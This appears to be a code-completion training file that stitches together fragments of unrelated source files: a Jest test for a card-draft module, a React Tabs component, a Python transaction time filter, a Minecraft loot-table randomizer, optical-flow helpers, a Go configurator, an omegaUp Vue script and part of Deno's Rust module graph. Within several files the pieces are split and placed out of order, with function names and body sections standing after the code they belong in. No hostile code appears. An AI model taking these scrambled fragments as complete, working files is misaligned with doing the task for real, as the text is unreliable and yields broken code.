expect(() => {
methods.populateDraft(draft, format, cards, bots, seats);
}).toThrow(/no bots/);
});
it('returns an error if seats < 2', () => {
cards = ['mockcards'];
bots = ['mockbot'];
expect(() => {
methods.populateDraft(draft, format, cards, bots, 1);
}).toThrow(/invalid seats/);
expect(() => {
methods.populateDraft(draft, format, cards, bots, null);
}).toThrow(/invalid seats/);
expect(() => {
methods.populateDraft(draft, format, cards, bots, -1);
}).toThrow(/invalid seats/);
});
describe('', () => {
let exampleCube;
beforeAll(() => {
exampleCube = JSON.parse(JSON.stringify(cubefixture.exampleCube));
exampleCube.draft_formats = [];
exampleCube.draft_formats[0] = {}; // mock
return carddb.initializeCardDb(fixturesPath, true).then(() => {
exampleCube.cards.forEach(function(card, index) {
card.details = carddb.cardFromId(card.cardID);
});
});
});
it('sets the intitial state of the draft', () => {
cards = exampleCube.cards.slice();
bots = ['mockbot'];
format = methods.getDraftFormat({ id: -1, packs: 1, cards: 15, seats: seats }, exampleCube);
methods.populateDraft(draft, format, cards, bots, 8);
expect(draft.pickNumber).toEqual(1);
expect(draft.packNumber).toEqual(1);
expect(draft).toHaveProperty('packs');
expect(draft).toHaveProperty('packs');
expect(draft).toHaveProperty('bots');
// CoreMongooseArray causing trouble, so we check length and use stringify
expect(draft.bots.length).toEqual(1);
let initial_stateJSON = JSON.stringify(draft.initial_state);
let packsJSON = JSON.stringify(draft.packs);
expect(initial_stateJSON).toEqual(packsJSON);
});
it('fails if it runs out of cards in a standard draft', () => {
cards = exampleCube.cards.slice();
bots = ['mockbot'];
seats = 8;
// cube only contains 65 cards, so 8 * 1 * 15 = 120, should run out if multiples = false
format = methods.getDraftFormat({ id: -1, packs: 1, cards: 15, seats: seats }, exampleCube);
expect(() => {
methods.populateDraft(draft, format, cards, bots, seats);
}).toThrow(/not enough cards/);
});
it('fails if it runs out of cards in a custom draft', () => {
cards = exampleCube.cards.slice();
bots = ['mockbot'];
seats = 8;
// cube only contains 65 cards, so 8 * 2 * 5 = 80, should run out if multiples = false
exampleCube.draft_formats[0].packs = '[["*","*","*","*","*"],["*","*","*","*","*"]]';
format = methods.getDraftFormat({ id: 0 }, exampleCube);
expect(() => {
methods.populateDraft(draft, format, cards, bots, seats);
}).toThrow(/not enough cards/);
});
it.only('fails if it runs out of filtered cards in a custom draft', () => {
cards = exampleCube.cards.slice();
bots = ['mockbot'];
seats = 6;
// cube only contains 65 cards, so 6 * 5 = 30 > 13 blue cards, should run out if multiples = false
exampleCube.draft_formats[0].packs = '[["c>=u","c>=u","c:u","c:u","c:u"],["*"]]';
format = methods.getDraftFormat({ id: 0 }, exampleCube);
format.multiples = true;
expect(() => {
methods.populateDraft(draft, format, cards, bots, seats);
}).not.toThrow(/not enough cards/);
// note: because multiples true, cards not "used up" for next check
format.multiples = false;
expect(() => {
methods.populateDraft(draft, format, cards, bots, seats);
}).toThrow(/not enough cards/);
});
});
}); | }
expectedFormat.push([filterText]);
});
return expectedFormat; |
index.tsx | /**
* Copyright (c) Facebook, Inc. and its affiliates.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*/
import React, {useState, Children, ReactElement} from 'react';
import useUserPreferencesContext from '@theme/hooks/useUserPreferencesContext';
import clsx from 'clsx';
import styles from './styles.module.css';
const keys = {
left: 37,
right: 39,
};
type Props = {
block?: boolean;
children: ReactElement<{value: string}>[];
defaultValue?: string;
values: {value: string; label: string}[];
groupId?: string;
};
function | (props: Props): JSX.Element {
const {block, children, defaultValue, values, groupId} = props;
const {tabGroupChoices, setTabGroupChoices} = useUserPreferencesContext();
const [selectedValue, setSelectedValue] = useState(defaultValue);
if (groupId != null) {
const relevantTabGroupChoice = tabGroupChoices[groupId];
if (
relevantTabGroupChoice != null &&
relevantTabGroupChoice !== selectedValue &&
values.some((value) => value.value === relevantTabGroupChoice)
) {
setSelectedValue(relevantTabGroupChoice);
}
}
const changeSelectedValue = (newValue) => {
setSelectedValue(newValue);
if (groupId != null) {
setTabGroupChoices(groupId, newValue);
}
};
const tabRefs: (HTMLLIElement | null)[] = [];
const focusNextTab = (tabs, target) => {
const next = tabs.indexOf(target) + 1;
if (!tabs[next]) {
tabs[0].focus();
} else {
tabs[next].focus();
}
};
const focusPreviousTab = (tabs, target) => {
const prev = tabs.indexOf(target) - 1;
if (!tabs[prev]) {
tabs[tabs.length - 1].focus();
} else {
tabs[prev].focus();
}
};
const handleKeydown = (tabs, target, event) => {
switch (event.keyCode) {
case keys.right:
focusNextTab(tabs, target);
break;
case keys.left:
focusPreviousTab(tabs, target);
break;
default:
break;
}
};
return (
<div>
<ul
role="tablist"
aria-orientation="horizontal"
className={clsx('tabs', {
'tabs--block': block,
})}>
{values.map(({value, label}) => (
<li
role="tab"
tabIndex={0}
aria-selected={selectedValue === value}
className={clsx('tabs__item', styles.tabItem, {
'tabs__item--active': selectedValue === value,
})}
key={value}
ref={(tabControl) => tabRefs.push(tabControl)}
onKeyDown={(event) => handleKeydown(tabRefs, event.target, event)}
onFocus={() => changeSelectedValue(value)}
onClick={() => changeSelectedValue(value)}>
{label}
</li>
))}
</ul>
<div role="tabpanel" className="margin-vert--md">
{
Children.toArray(children).filter(
(child) =>
(child as ReactElement<{value: string}>).props.value ===
selectedValue,
)[0]
}
</div>
</div>
);
}
export default Tabs;
| Tabs |
time.py | from typing import Callable
from datetime import datetime, timezone
from time import mktime
from ..common.const import (
MILESTONES_USING_TIMESTAMP_ONLY,
TIMESTAMP_B,
TIMESTAMP_E,
ATCH_TIMESTAMP_B,
ATCH_TIMESTAMP_E
)
from ..common import tryte_to_int
import logging
__all__ = [
'TimeFilter',
]
class TimeFilter():
"""
Time filter for transaction
Attributes
----------
min : int
The private earliest Unix epoch time for filtering
max : int
The private latest Unix epoch time for filtering
Methods
-------
make_filter()
Return the built time filter
"""
def __init__(self, start_date: str, end_date: str) -> None:
"""
Parameters
----------
start_date : str
The start_date (%Y%m%d) of transaction to monitor (e.g., "20200101")
end_date : str
The end_date (%Y%m%d) of transaction to monitor (e.g., "20200201")
"""
try:
self._min = mktime(datetime.strptime(
start_date, "%Y%m%d").timetuple())
self._max = mktime(datetime.strptime(
end_date, "%Y%m%d").timetuple())
except:
logging.error("Dates {} and {} are not supported!".format(
start_date, end_date))
logging.error("Plese use \"%Y%m%d\" instead, e.g., \"20200101\"")
def _get_transaction_dmp(self, timestamp: int, attachmenttimestame: int, milestone: str) -> int:
|
def _get_transaction_time(self, timestamp: int, attachmenttimestame: int) -> int:
if attachmenttimestame != 0:
return attachmenttimestame/1000
else:
return timestamp
def _time_range_filter(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t < self._max and t > self._min
except:
logging.error(
"Objects for time filtering (min<time<max) do not have time item!")
def _time_filter_larger_than_min(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t > self._min
except:
logging.error(
"Objects for time filtering (time>min) do not have time item!")
def _time_filter_smaller_than_max(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t < self._max
except:
logging.error(
"Objects for smaller time filtering (time<max) do not have time item!")
def _time_euqal_filter(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t == self._min
except:
logging.error(
"Objects for time filtering (time=min) do not have time item!")
def _time_range_with_euqal_filter(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t <= self._max and t >= self._min
except:
logging.error(
"Objects for time filtering (min<=time<=max) do not have time item!")
def _time_filter_equal_to_or_larger_than_min(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t >= self._min
except:
logging.error(
"Objects for time filtering (time>=min) do not have time item!")
def _time_filter_equal_to_or_smaller_than_max(self, transaction: dict) -> bool:
try:
t = self._get_transaction_time(
transaction['timestamp'], transaction['attachment_timestamp'])
return t <= self._max
except:
logging.error(
"Objects for smaller time filtering (time<=max) do not have time item!")
def _dmptime_range_filter_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t < self._max and t > self._min
except:
logging.error(
"Objects for time filtering (min<time<max) do not have time item!")
def _dmptime_filter_larger_than_min_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t > self._min
except:
logging.error(
"Objects for time filtering (time>min) do not have time item!")
def _dmptime_filter_smaller_than_max_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t < self._max
except:
logging.error(
"Objects for smaller time filtering (time<max) do not have time item!")
def _dmptime_euqal_filter_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t == self._min
except:
logging.error(
"Objects for time filtering (time=min) do not have time item!")
def _dmptime_range_with_euqal_filter_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t <= self._max and t >= self._min
except:
logging.error(
"Objects for time filtering (min<=time<=max) do not have time item!")
def _dmptime_filter_equal_to_or_larger_than_min_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t >= self._min
except:
logging.error(
"Objects for time filtering (time>=min) do not have time item!")
def _dmptime_filter_equal_to_or_smaller_than_max_str(self, transaction_milestone: tuple) -> bool:
try:
timestamp = tryte_to_int(
transaction_milestone[0], TIMESTAMP_B, TIMESTAMP_E)
attachment_timestamp = tryte_to_int(
transaction_milestone[0], ATCH_TIMESTAMP_B, ATCH_TIMESTAMP_E)
milestone = transaction_milestone[1]
t = self._get_transaction_dmp(
timestamp, attachment_timestamp, milestone)
return t <= self._max
except:
logging.error(
"Objects for smaller time filtering (time<=max) do not have time item!")
def _time_range_filter_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t < self._max and t > self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_larger_than_min_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t > self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_smaller_than_max_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t < self._max
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_euqal_filter_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t == self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_range_with_euqal_filter_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t <= self._max and t >= self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_equal_to_or_larger_than_min_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t >= self._min
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def _time_filter_equal_to_or_smaller_than_max_str(self, transaction: str) -> bool:
try:
t = tryte_to_int(transaction, TIMESTAMP_B, TIMESTAMP_E)
return t <= self._max
except:
logging.error(f"Cannot identify timestamp: {transaction}!")
def make_filter(self, range_larger_smaller='R') -> Callable:
"""time filter generation function.
Parameters
----------
range_larger_smaller_equal (str) :
'R' for min < time < max
'm' for time > min
'M' for time < max
'E' for time = min
'RE' for min <= time <= max
'mE' for time >= min
'ME' for time <= max
Returns
----------
The built time filter.
"""
if range_larger_smaller == 'R':
return self._time_range_filter_str
elif range_larger_smaller == 'm':
return self._time_filter_larger_than_min_str
elif range_larger_smaller == 'M':
return self._time_filter_smaller_than_max_str
elif range_larger_smaller == 'E':
return self._time_euqal_filter_str
elif range_larger_smaller == 'RE':
return self._time_range_with_euqal_filter_str
elif range_larger_smaller == 'mE':
return self._time_filter_equal_to_or_larger_than_min_str
elif range_larger_smaller == 'ME':
return self._time_filter_equal_to_or_smaller_than_max_str
else:
raise ValueError(
"{} is not supported!".format(range_larger_smaller))
def make_dmp_filter(self, range_larger_smaller='R') -> Callable:
"""time filter generation function for dmp data.
When using this filter, the milestone for each transaction should be indicated.
Parameters
----------
range_larger_smaller_equal (str) :
'R' for min < time < max
'm' for time > min
'M' for time < max
'E' for time = min
'RE' for min <= time <= max
'mE' for time >= min
'ME' for time <= max
Returns
----------
The built time filter.
"""
if range_larger_smaller == 'R':
return self._dmptime_range_filter_str
elif range_larger_smaller == 'm':
return self._dmptime_filter_larger_than_min_str
elif range_larger_smaller == 'M':
return self._dmptime_filter_smaller_than_max_str
elif range_larger_smaller == 'E':
return self._dmptime_euqal_filter_str
elif range_larger_smaller == 'RE':
return self._dmptime_range_with_euqal_filter_str
elif range_larger_smaller == 'mE':
return self._dmptime_filter_equal_to_or_larger_than_min_str
elif range_larger_smaller == 'ME':
return self._dmptime_filter_equal_to_or_smaller_than_max_str
else:
raise ValueError(
"{} is not supported!".format(range_larger_smaller))
| if milestone in MILESTONES_USING_TIMESTAMP_ONLY:
return timestamp
if attachmenttimestame != 0:
return attachmenttimestame/1000
else:
return timestamp |
loot_tables.py | import os
import json
import yaml
from typing import OrderedDict
from yaml.loader import FullLoader
from paths import RANDO_ROOT_PATH
class loot_tables:
def get_loot_tables(self, options):
|
def read_loot_tables(self, mob_loot_table_list, chest_loot_table_list):
self.loot_table_path = 'loot_tables'
self.mob_r_loot_tables = []
self.mob_s_loot_tables = []
self.chest_r_loot_tables = []
self.chest_s_loot_tables = []
self.patched_mob_loot_table_list = []
for m in mob_loot_table_list:
with (RANDO_ROOT_PATH / self.loot_table_path / 'entities' / m['file']).open('r') as mlt:
self.mob_loot_table = json.load(mlt)
self.mob_r_loot_tables.append(self.mob_loot_table)
if self.mob_loot_table == {}:
m['empty'] = True
else:
m['empty'] = False
self.mob_s_loot_tables.append(m['name'])
self.patched_mob_loot_table_list.append(m)
for c in chest_loot_table_list:
with (RANDO_ROOT_PATH / self.loot_table_path / 'chests' / c['file']).open('r') as clt:
self.chest_r_loot_tables.append(json.load(clt))
self.chest_s_loot_tables.append(c['name'])
return self.mob_r_loot_tables, self.mob_s_loot_tables, self.chest_r_loot_tables, self.chest_s_loot_tables, self.patched_mob_loot_table_list
def write_loot_tables(self, mob_loot_tables, mob_s_loot_tables, chest_loot_tables, chest_s_loot_tables):
self.mob_loot_tables_names = []
self.mob_loot_tables_files = []
self.chest_loot_tables_names = []
self.chest_loot_tables_files = []
for mlt in self.mob_loot_tables_list:
self.mob_loot_tables_names.append(mlt['name'])
self.mob_loot_tables_files.append(mlt['file'])
for clt in self.chest_loot_tables_list:
self.chest_loot_tables_names.append(clt['name'])
self.chest_loot_tables_files.append(clt['file'])
self.patched_mob_loot_tables = OrderedDict(zip(self.mob_loot_tables_files, mob_loot_tables))
self.spoiler_mob_loot_tables = OrderedDict(zip(self.mob_loot_tables_names, mob_s_loot_tables))
self.patched_chest_loot_tables = OrderedDict(zip(self.chest_loot_tables_files, chest_loot_tables))
self.spoiler_chest_loot_tables = OrderedDict(zip(self.chest_loot_tables_names, chest_s_loot_tables))
return self.patched_mob_loot_tables, self.spoiler_mob_loot_tables, self.patched_chest_loot_tables, self.spoiler_chest_loot_tables | with (RANDO_ROOT_PATH / 'loot_table_categories.yaml').open('r') as loot_tables:
self.loot_table_list = yaml.load(loot_tables, Loader=FullLoader)
self.randomized_mob_loot_table_list = []
self.unrandomized_mob_loot_table_list = []
self.randomized_chest_loot_table_list = []
self.unrandomized_chest_loot_table_list = []
for mob_lt in self.loot_table_list['entities']:
if options['version'] in [str(ver) for ver in mob_lt['versions']]:
if options['randomized_' + mob_lt['type']] == True:
self.randomized_mob_loot_table_list.append(mob_lt)
else:
self.unrandomized_mob_loot_table_list.append(mob_lt)
else:
continue
for chest_lt in self.loot_table_list['chests']:
if options['version'] in [str(ver) for ver in chest_lt['versions']]:
if options['randomized_' + chest_lt['type'] + '_chests'] == True:
self.randomized_chest_loot_table_list.append(chest_lt)
else:
self.unrandomized_chest_loot_table_list.append(chest_lt)
else:
continue
self.mob_loot_tables_list = self.randomized_mob_loot_table_list + self.unrandomized_mob_loot_table_list
self.chest_loot_tables_list = self.randomized_chest_loot_table_list + self.unrandomized_chest_loot_table_list
return self.randomized_mob_loot_table_list, self.unrandomized_mob_loot_table_list, self.randomized_chest_loot_table_list, self.unrandomized_chest_loot_table_list |
flow.py | import numpy as np
import cv2
def make_colorwheel():
'''
Generates a color wheel for optical flow visualization as presented in:
Baker et al. "A Database and Evaluation Methodology for Optical Flow" (ICCV, 2007)
URL: http://vision.middlebury.edu/flow/flowEval-iccv07.pdf
According to the C++ source code of Daniel Scharstein
According to the Matlab source code of Deqing Sun
'''
RY = 15
YG = 6
GC = 4
CB = 11
BM = 13
MR = 6
ncols = RY + YG + GC + CB + BM + MR
colorwheel = np.zeros((ncols, 3))
col = 0
# RY
colorwheel[0:RY, 0] = 255
colorwheel[0:RY, 1] = np.floor(255 * np.arange(0, RY) / RY)
col = col + RY
# YG
colorwheel[col:col + YG, 0] = 255 - np.floor(255 * np.arange(0, YG) / YG)
colorwheel[col:col + YG, 1] = 255
col = col + YG
# GC
colorwheel[col:col + GC, 1] = 255
colorwheel[col:col + GC, 2] = np.floor(255 * np.arange(0, GC) / GC)
col = col + GC
# CB
colorwheel[col:col + CB, 1] = 255 - np.floor(255 * np.arange(CB) / CB)
colorwheel[col:col + CB, 2] = 255
col = col + CB
# BM
colorwheel[col:col + BM, 2] = 255
colorwheel[col:col + BM, 0] = np.floor(255 * np.arange(0, BM) / BM)
col = col + BM
# MR
colorwheel[col:col + MR, 2] = 255 - np.floor(255 * np.arange(MR) / MR)
colorwheel[col:col + MR, 0] = 255
return colorwheel
def flow_compute_color(u, v, convert_to_bgr=False):
|
def flow_to_color(flow_uv, clip_flow=None, convert_to_bgr=False):
'''
Expects a two dimensional flow image of shape [H,W,2]
According to the C++ source code of Daniel Scharstein
According to the Matlab source code of Deqing Sun
:param flow_uv: np.ndarray of shape [H,W,2]
:param clip_flow: float, maximum clipping value for flow
:return:
'''
assert flow_uv.ndim == 3, 'input flow must have three dimensions'
assert flow_uv.shape[2] == 2, 'input flow must have shape [H,W,2]'
if clip_flow is not None:
flow_uv = np.clip(flow_uv, 0, clip_flow)
u = flow_uv[:, :, 0]
v = flow_uv[:, :, 1]
rad = np.sqrt(np.square(u) + np.square(v))
rad_max = np.max(rad)
epsilon = 1e-5
u = u / (rad_max + epsilon)
v = v / (rad_max + epsilon)
return flow_compute_color(u, v, convert_to_bgr)
def readFlow(name):
f = open(name, 'rb')
header = f.read(4)
if header.decode("utf-8") != 'PIEH':
raise Exception('Flow file header does not contain PIEH')
width = np.fromfile(f, np.int32, 1).squeeze()
height = np.fromfile(f, np.int32, 1).squeeze()
flow = np.fromfile(f, np.float32, width * height * 2).reshape((height,
width, 2))
f.close()
return flow.astype(np.float32)
def get_warp_label(flow1, flow2, label1, th=50, value=0):
label2 = np.ones_like(label1, dtype=label1.dtype) * value
height = flow1.shape[0]
width = flow1.shape[1]
flow_t = np.zeros_like(flow1, dtype=flow1.dtype)
grid = np.indices((height, width)).swapaxes(0, 1).swapaxes(1, 2)
dx = grid[:, :, 0] + flow2[:, :, 1]
dy = grid[:, :, 1] + flow2[:, :, 0]
sx = np.floor(dx).astype(int)
sy = np.floor(dy).astype(int)
valid = (sx >= 0) & (sx < height - 1) & (sy >= 0) & (sy < width - 1)
sx_mat = np.dstack((sx, sx + 1, sx, sx + 1)).clip(0, height - 1)
sy_mat = np.dstack((sy, sy, sy + 1, sy + 1)).clip(0, width - 1)
sxsy_mat = np.abs((1 - np.abs(sx_mat - dx[:, :, np.newaxis])) *
(1 - np.abs(sy_mat - dy[:, :, np.newaxis])))
for i in range(4):
flow_t = flow_t + sxsy_mat[:, :, i][:, :, np.
newaxis] * flow1[sx_mat[:, :, i],
sy_mat[:, :, i], :]
valid = valid & (np.linalg.norm(
flow_t[:, :, [1, 0]] + np.dstack((dx, dy)) - grid, axis=2) < th)
flow_t = (flow2 - flow_t) / 2.0
dx = grid[:, :, 0] + flow_t[:, :, 1]
dy = grid[:, :, 1] + flow_t[:, :, 0]
valid = valid & (dx >= 0) & (dx < height - 1) & (dy >= 0) & (dy < width - 1)
label2[valid, :] = label1[dx[valid].round().astype(int), dy[valid].round()
.astype(int), :]
return label2
def flow_tf(flow, size):
flow_shape = flow.shape
flow_resized = cv2.resize(flow, (size[1], size[0]))
flow_resized[:, :, 0] *= (float(size[1]) / float(flow_shape[1]))
flow_resized[:, :, 1] *= (float(size[0]) / float(flow_shape[0]))
return flow_resized | '''
Applies the flow color wheel to (possibly clipped) flow components u and v.
According to the C++ source code of Daniel Scharstein
According to the Matlab source code of Deqing Sun
:param u: np.ndarray, input horizontal flow
:param v: np.ndarray, input vertical flow
:param convert_to_bgr: bool, whether to change ordering and output BGR instead of RGB
:return:
'''
flow_image = np.zeros((u.shape[0], u.shape[1], 3), np.uint8)
colorwheel = make_colorwheel() # shape [55x3]
ncols = colorwheel.shape[0]
rad = np.sqrt(np.square(u) + np.square(v))
a = np.arctan2(-v, -u) / np.pi
fk = (a + 1) / 2 * (ncols - 1) + 1
k0 = np.floor(fk).astype(np.int32)
k0[k0 > 53] = 53
k1 = k0 + 1
k1[k1 == ncols] = 1
f = fk - k0
for i in range(colorwheel.shape[1]):
tmp = colorwheel[:, i]
col0 = tmp[k0] / 255.0
col1 = tmp[k1] / 255.0
col = (1 - f) * col0 + f * col1
idx = (rad <= 1)
col[idx] = 1 - rad[idx] * (1 - col[idx])
col[~idx] = col[~idx] * 0.75 # out of range?
# Note the 2-i => BGR instead of RGB
ch_idx = 2 - i if convert_to_bgr else i
flow_image[:, :, ch_idx] = np.floor(255 * col)
return flow_image |
configurator.go | // Copyright 2019 Xusixxxx Author. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License"); | //
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package config
import "time"
// 配置器实例
var Config Configurator
// 初始化配置器
func init() {
Config = Configurator{
Name: "Xusi General Development Suite",
PackageHeader: "Xusi/xusi-framework",
Describe: `
<h3>欢迎查看 <kbd>xusi-framework</kbd> 项目文档</h3>
<footer>该文档由 <kbd>xusi-framework-xdoc</kbd> 自动化生成,为最近一次编译的最新版本文档。</footer>
`,
DescribeLabel: `
<p style="font-size:13px;">@Xusixxxx ( [email protected] )</p>
<p style="font-size:13px;">最后更新时间:` + time.Now().String()[:19] + `</p>
`,
}
}
/* XusiStrcut ->
@describe 控制xdoc一些状态的配置器
*/
type Configurator struct {
Name string // $describe 文档名称
PackageHeader string // $describe 文档包头,会对import路径造成影响
Describe string // $describe 文档描述,可使用HTML编码
DescribeLabel string // $describe 文档描述标签,可使用HTML编码
} // -< End | // you may not use this file except in compliance with the License.
// You may obtain a copy of the License at |
solution.ts | import Vue from 'vue';
import { OmegaUp } from '../omegaup';
import T from '../lang'; |
import problem_Solution from '../components/problem/Solution.vue';
OmegaUp.on('ready', () => {
const payload = types.payloadParsers.ProblemDetailsPayload();
const problemSolution = new Vue({
el: '#problem-solution',
render: function (createElement) {
return createElement('omegaup-problem-solution', {
props: {
status: this.status,
solution: this.solution,
allTokens: this.allTokens,
availableTokens: this.availableTokens,
},
on: {
'unlock-solution': () => {
api.Problem.solution(
{
problem_alias: payload.alias,
forfeit_problem: true,
},
{ quiet: true },
)
.then((data) => {
if (!data.solution) {
ui.error(T.wordsProblemOrSolutionNotExist);
return;
}
problemSolution.status = 'unlocked';
problemSolution.solution = data.solution;
ui.info(
ui.formatString(T.solutionTokens, {
available: problemSolution.availableTokens - 1,
total: problemSolution.allTokens,
}),
);
})
.catch((error) => {
if (error.httpStatusCode == 404) {
ui.error(T.wordsProblemOrSolutionNotExist);
return;
}
ui.apiError(error);
});
},
'get-tokens': () => {
api.ProblemForfeited.getCounts()
.then((data) => {
problemSolution.allTokens = data.allowed;
problemSolution.availableTokens = data.allowed - data.seen;
if (problemSolution.availableTokens <= 0) {
ui.warning(T.solutionNoTokens);
}
})
.catch(ui.apiError);
},
'get-solution': () => {
if (payload.solution_status === 'unlocked') {
api.Problem.solution(
{ problem_alias: payload.alias },
{ quiet: true },
)
.then((data) => {
if (!data.solution) {
ui.error(T.wordsProblemOrSolutionNotExist);
return;
}
problemSolution.solution = data.solution;
})
.catch((error) => {
if (error.httpStatusCode == 404) {
ui.error(T.wordsProblemOrSolutionNotExist);
return;
}
ui.apiError(error);
});
}
},
},
});
},
data: {
status: payload.solution_status || 'not_logged_in',
solution: <types.ProblemStatement | null>null,
allTokens: 0,
availableTokens: 0,
},
components: {
'omegaup-problem-solution': problem_Solution,
},
});
}); | import * as api from '../api';
import * as ui from '../ui';
import { types } from '../api_types'; |
module_graph2.rs | // Copyright 2018-2020 the Deno authors. All rights reserved. MIT license.
use crate::ast;
use crate::ast::parse;
use crate::ast::transpile_module;
use crate::ast::BundleHook;
use crate::ast::Location;
use crate::ast::ParsedModule;
use crate::colors;
use crate::diagnostics::Diagnostics;
use crate::import_map::ImportMap;
use crate::info::ModuleGraphInfo;
use crate::info::ModuleInfo;
use crate::info::ModuleInfoMap;
use crate::info::ModuleInfoMapItem;
use crate::js;
use crate::lockfile::Lockfile;
use crate::media_type::MediaType;
use crate::specifier_handler::CachedModule;
use crate::specifier_handler::Dependency;
use crate::specifier_handler::DependencyMap;
use crate::specifier_handler::Emit;
use crate::specifier_handler::FetchFuture;
use crate::specifier_handler::SpecifierHandler;
use crate::tsc2;
use crate::tsc_config::IgnoredCompilerOptions;
use crate::tsc_config::TsConfig;
use crate::version;
use crate::AnyError;
use deno_core::error::Context;
use deno_core::futures::stream::FuturesUnordered;
use deno_core::futures::stream::StreamExt;
use deno_core::serde::Serialize;
use deno_core::serde::Serializer;
use deno_core::serde_json::json;
use deno_core::serde_json::Value;
use deno_core::ModuleResolutionError;
use deno_core::ModuleSpecifier;
use regex::Regex;
use serde::Deserialize;
use serde::Deserializer;
use std::cell::RefCell;
use std::collections::HashMap;
use std::collections::HashSet;
use std::error::Error;
use std::fmt;
use std::path::PathBuf;
use std::rc::Rc;
use std::result;
use std::sync::Arc;
use std::sync::Mutex;
use std::time::Instant;
lazy_static! {
/// Matched the `@deno-types` pragma.
static ref DENO_TYPES_RE: Regex =
Regex::new(r#"(?i)^\s*@deno-types\s*=\s*(?:["']([^"']+)["']|(\S+))"#)
.unwrap();
/// Matches a `/// <reference ... />` comment reference.
static ref TRIPLE_SLASH_REFERENCE_RE: Regex =
Regex::new(r"(?i)^/\s*<reference\s.*?/>").unwrap();
/// Matches a path reference, which adds a dependency to a module
static ref PATH_REFERENCE_RE: Regex =
Regex::new(r#"(?i)\spath\s*=\s*["']([^"']*)["']"#).unwrap();
/// Matches a types reference, which for JavaScript files indicates the
/// location of types to use when type checking a program that includes it as
/// a dependency.
static ref TYPES_REFERENCE_RE: Regex =
Regex::new(r#"(?i)\stypes\s*=\s*["']([^"']*)["']"#).unwrap();
}
/// A group of errors that represent errors that can occur when interacting with
/// a module graph.
#[derive(Debug, Clone, Eq, PartialEq)]
pub enum GraphError {
/// A module using the HTTPS protocol is trying to import a module with an
/// HTTP schema.
InvalidDowngrade(ModuleSpecifier, Location),
/// A remote module is trying to import a local module.
InvalidLocalImport(ModuleSpecifier, Location),
/// The source code is invalid, as it does not match the expected hash in the
/// lockfile.
InvalidSource(ModuleSpecifier, PathBuf),
/// An unexpected dependency was requested for a module.
MissingDependency(ModuleSpecifier, String),
/// An unexpected specifier was requested.
MissingSpecifier(ModuleSpecifier),
/// The current feature is not supported.
NotSupported(String),
/// A unsupported media type was attempted to be imported as a module.
UnsupportedImportType(ModuleSpecifier, MediaType),
}
